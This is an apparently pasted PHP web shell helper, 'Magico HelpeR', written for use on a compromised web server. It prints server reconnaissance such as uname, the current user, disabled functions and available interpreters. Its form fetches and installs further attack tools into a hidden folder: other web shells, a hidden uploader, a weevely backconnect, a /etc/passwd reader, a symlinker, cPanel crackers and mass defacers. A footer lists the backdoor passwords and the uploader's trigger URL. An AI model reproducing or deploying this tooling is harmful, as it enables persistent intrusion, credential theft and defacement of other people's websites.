

Feb 21st, 2018
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  1. <?php
  3. ?>
  6. <html>
  7. <head>
  8. <meta content="text/html; charset=ISO-8859-1"
  9. http-equiv="content-type">
  10. <title>.:! Magico HelpeR !:.</title>
  11. </head>
  12. <body style="background-color: black; color: rgb(0, 0, 0);"
  13. alink="#ee0000" link="#0000ee" vlink="#551a8b">
  14. <div style="text-align: left;"><span style="color: rgb(0, 153, 0);"></span><span
  15. style="color: rgb(51, 204, 0); font-weight: bold;"><span
  16. style="color: rgb(153, 153, 0);">.:!~@</span># </span><span
  17. style="color: red; font-weight: bold;"><a href="">Magico Helper</a></span><span
  18. style="font-weight: bold;"> </span><span
  19. style="color: rgb(51, 204, 0); font-weight: bold;">#<span
  20. style="color: rgb(153, 153, 0);">@~!:.</span></span><span
  21. style="color: white;"></span>
  22. <span style="font-weight: bold;"></span><br>
  23. <span style="font-weight: bold;"><img
  24. style="width: 239px; height: 186px;" alt=""
  25. src=""></span><br>
  26. <span style="font-weight: bold;"></span><small><span
  27. style="color: rgb(0, 153, 0);"><big><small><b>.: <span
  28. style="color: rgb(204, 153, 51);">Server InFo </span>:.</b></small></big></span></small><br>
  29. <small><span style="color: rgb(0, 153, 0);"><big>
  30. <small>---------------------------------------------------------------------------------------<br>
  31. <?php
  32. @set_time_limit(0);
  33. @error_reporting(0);
  34. echo "<b>[#]<span style=\"color: rgb(51, 204, 0);\"> Server Software : </span></b>".$_SERVER['SERVER_SOFTWARE']."<br>";
  35. echo "<b>[#]<span style=\"color: rgb(51, 204, 0);\"> Server Admin : </span></b>".$_SERVER['SERVER_ADMIN']."<br>";
  36. echo "<b>[#]<span style=\"color: rgb(51, 204, 0);\"> User : </span></b>".get_current_user()."<br>";
  37. echo "<b>[#]<span style=\"color: rgb(51, 204, 0);\"> Server IP : </span></b>".$_SERVER['SERVER_ADDR']."<br>";
  38. echo "<b>[#]<span style=\"color: rgb(51, 204, 0);\"> Your IP : </span></b>".$_SERVER["REMOTE_ADDR"]."<br>";
  39. echo "<b>[#]<span style=\"color: rgb(51, 204, 0);\"> Uname : </span></b>".php_uname()."<br>";
  40. echo "<b>[#]<span style=\"color: rgb(51, 204, 0);\"> Php version : </span></b>".phpversion()."<br>";
  41. echo "<b>[#]<span style=\"color: rgb(51, 204, 0);\"> Dir : </span></b>".getcwd()."<br>";
  42. ////////////////////////////////////
  43. echo "<b>[#]<span style=\"color: rgb(51, 204, 0);\"> Safe Mode : </span></b>";
  44. if(@ini_get('safe_mode') or strtolower(@ini_get('safe_mode')) == 'on'){
  45. echo "<span style=\"font-weight: bold; color: red;\">On</span>";
  47. }else{ echo"<span style=\"color: rgb(153, 153, 153);\">Off</span>"; }
  48. echo "<br>";
  49. //////////////////////////////////
  50. echo "<b>[#]<span style=\"color: rgb(51, 204, 0);\"> Curl :</span></b>";
  51. if(function_exists("curl_version")){
  52. echo"<span style=\"font-weight: bold; color: red;\">On</span>";
  53. }else{ echo"<span style=\"color: rgb(153, 153, 153);\">Off</span>";}
  55. echo " - <b>[#]<span style=\"color: rgb(51, 204, 0);\"> Perl :</span></b>";
  56. if(function_exists("perl -h")){
  57. echo"<span style=\"font-weight: bold; color: red;\">On</span>";
  58. }else{ echo"<span style=\"color: rgb(153, 153, 153);\">Off</span>";}
  60. echo " - <b>[#]<span style=\"color: rgb(51, 204, 0);\"> Python :</span></b>";
  61. if(function_exists("python -h")){
  62. echo"<span style=\"font-weight: bold; color: red;\">On</span>";
  63. }else{ echo"<span style=\"color: rgb(153, 153, 153);\">Off</span>";}
  65. echo " - <b>[#]<span style=\"color: rgb(51, 204, 0);\"> Bash :</span></b>";
  66. if(function_exists("bash -h")){
  67. echo"<span style=\"font-weight: bold; color: red;\">On</span>";
  68. }else{ echo"<span style=\"color: rgb(153, 153, 153);\">Off</span>";}
  70. echo " - <b>[#]<span style=\"color: rgb(51, 204, 0);\"> Mysql :</span></b>";
  71. if(function_exists("mysql_connect")){
  72. echo"<span style=\"font-weight: bold; color: red;\">On</span>";
  73. }else{ echo"<span style=\"color: rgb(153, 153, 153);\">Off</span>";}
  75. echo " - <b>[#]<span style=\"color: rgb(51, 204, 0);\"> Mssql :</span></b>";
  76. if(function_exists("mssql_connect")){
  77. echo"<span style=\"font-weight: bold; color: red;\">On</span>";
  78. }else{ echo"<span style=\"color: rgb(153, 153, 153);\">Off</span>";}
  80. echo " - <b>[#]<span style=\"color: rgb(51, 204, 0);\"> Oracle :</span></b>";
  81. if(function_exists("ocilogon")){
  82. echo"<span style=\"font-weight: bold; color: red;\">On</span>";
  83. }else{ echo"<span style=\"color: rgb(153, 153, 153);\">Off</span>";}
  85. echo " - <b>[#]<span style=\"color: rgb(51, 204, 0);\"> Postgrase :</span></b>";
  86. if(function_exists("pg_connect")){
  87. echo"<span style=\"font-weight: bold; color: red;\">On</span>";
  88. }else{ echo"<span style=\"color: rgb(153, 153, 153);\">Off</span>";}
  90. //////////////////////////////////
  91. echo "<br><b>[#]<span style=\"color: rgb(51, 204, 0);\"> Disable_functions : </span></b>";
  93. $disable_funs = @ini_get('disable_functions');
  94. $arr = explode(',', $disable_funs);
  95. foreach($arr as $fun){
  96. echo "<span style=\"font-weight: bold; color: red;\">$fun</span>"." - ";
  97. }
  100. /* or
  101. $funs =array("system","exec","shell_exec","passthru","ln","copy","symlink","show_source","mail");
  102. foreach($funs as $fun){
  103. if(!function_exists($fun)){
  104. echo $fun." - ";
  105. }
  106. }*/
  107. //////////////////////////////
  108. echo"<br>";
  109. echo"---------------------------------------------------------------------------------------------------------------------------------------------------<br><br>";
  110. echo'<form method="post">
  111. <b>[#]<span style=\"color: rgb(51, 204, 0);\"> Tools Grabber : <b></span><select name="tools" >
  112. <option>===================</option>
  113. <option>hidden uploader</option>
  114. <option>k2ll33d shell</option>
  115. <option>x shell</option>
  116. <option>webr00t</option>
  117. <option>fwso shell</option>
  118. <option>awso shell</option>
  119. <option>mass</option>
  120. <option>/etc/passwd</option>
  121. <option>server users</option>
  122. <option>backconnect weevely</option>
  123. <option>turbo cpanel</option>
  124. <option>symlinker</option>
  125. <option>adminer</option>
  126. <option>mailer</option>
  127. <option>Magico pws</option>
  128. <option>safe mode</option>
  129. <option>404 shell</option>
  130. <option>wp mass info changer</option>
  131. <option>jo mass info changer</option>
  132. <option>g-b file manager</option>
  134. </select>
  135. <input type="submit" name="get" value="Get" />
  136. </form>';
  137. /////////////////////////////////////////////////////////////////
  138. if(isset($_POST['get'])){
  139. switch($_POST['tools']){
  141. case "x shell":
  142. echo gino('','oop.php');
  143. break;
  144. //////////////////////////////////////////////
  145. case "webr00t":
  146. echo gino('','r00t.php');
  147. break;
  148. //////////////////////////////////////////////
  149. case "hidden uploader":
  150. echo gino('','upx.php');
  151. break;
  152. //////////////////////////////////////////////
  153. case "awso shell":
  154. echo gino('','awso.php');
  155. break;
  156. //////////////////////////////////////////////
  157. case "mass":
  158. echo gino('','mass.php');
  159. break;
  160. //////////////////////////////////////////////
  161. case "/etc/passwd":
  162. echo gino('','passwd.php');
  163. break;
  164. //////////////////////////////////////////////
  165. case "k2ll33d shell":
  166. echo gino('','k.php');
  167. break;
  168. //////////////////////////////////////////////
  169. case "fwso shell":
  170. echo gino('','fwso.php');
  171. break;
  172. //////////////////////////////////////////////
  173. case "adminer":
  174. echo gino('','adminer.php');
  175. break;
  176. //////////////////////////////////////////////
  177. case "backconnect weevely":
  178. echo gino('','bc.php');
  179. break;
  180. //////////////////////////////////////////////
  181. case "turbo cpanel":
  182. echo gino('','turbo.php');
  183. break;
  184. //////////////////////////////////////////////
  185. case "symlinker":
  186. echo gino('','symv4.php');
  187. break;
  188. //////////////////////////////////////////////
  189. case "server users":
  190. echo gino('','users.php');
  191. break;
  192. //////////////////////////////////////////////
  193. case "mailer":
  194. echo gino('','wp-mailer.php');
  195. break;
  196. //////////////////////////////////////////////
  197. case "Magico pws":
  198. echo gino('','pws.php');
  199. break;
  200. //////////////////////////////////////////////
  201. case "safe mode":
  202. echo gino('','php.ini');
  203. break;
  204. //////////////////////////////////////////////
  205. case "404 shell":
  206. echo gino('','404.php');
  207. break;
  208. //////////////////////////////////////////////
  209. case "wp mass info changer":
  210. echo gino('','wp-masser.php');
  211. break;
  212. //////////////////////////////////////////////
  213. case "jo mass info changer":
  214. echo gino('','jo-masser.php');
  215. break;
  216. //////////////////////////////////////////////
  217. case "g-b file manager":
  218. echo gino('','g-b.php');
  219. break;
  222. } // switch end
  223. }// end if
  224. ////////////////////////////////////////////////////////////////
  225. // by INJECTOR_MA
  226. function gino($input,$output){
  227. @mkdir('gino');
  228. @chdir('./gino');
  230. if(!file_exists($output)){
  232. $cn = @file_get_contents($input);
  233. $save = fopen("$output","a+"); fwrite($save,@file_get_contents($input)); fclose($save);
  234. return "<br>[#]DoNe: <a href=\"./gino/$output\"> Go to Here </a>";
  235. }else{ return "<br>[#] Allready Here : <a href=\"./gino/$output\"> Go to Here </a>"; }
  237. }
  238. ///////////////////////////////////////////////////////////////
  240. ?>
  242. <br><br>
  243. <span style="color: rgb(0, 153, 0);">[#]</span> <span
  244. style="color: rgb(0, 153, 0);"><span style="color: rgb(51, 204, 0);"><span
  245. style="color: rgb(153, 51, 153);">Please
  246. Notice</span> :</span> the password of the <span
  247. style="color: rgb(51, 204, 0);">[ weevely backdoor</span> ] is <span
  248. style="color: rgb(153, 153, 0);">123456</span></span>
  249. <br>
  250. <span
  251. style="color: rgb(0, 153, 0);">[#] the user of [<span
  252. style="color: rgb(51, 204, 0);"> fwso shell</span>
  253. ] is <span style="color: rgb(153, 153, 0);">magico</span> and the
  254. password is <span style="color: rgb(153, 153, 0);">xmagico</span></span>
  255. <span style="color: rgb(0, 153, 0);"></span>
  256. <br>
  257. <span style="color: rgb(0, 153, 0);">[#] to view <span
  258. style="color: rgb(51, 204, 0);">the hidden uplouder</span> write (<span
  259. style="color: rgb(153, 153, 0);">up.php?x=x</span>) </span><br>
  260. <span style="color: rgb(0, 153, 0);">[#] The Pass of <span
  261. style="color: rgb(51, 204, 0);">404 shell</span> is</span><span
  262. style="color: rgb(255, 204, 51);"> <span
  263. style="color: rgb(204, 153, 51);">xmagico</span></span>
  264. <br><b>...::::::: ::::::::...</b>
  267. </big></span></body></html>
  268. <?php echo '<form method="post"><input type="submit" name="unset" value="logout" /></form>'; ?>
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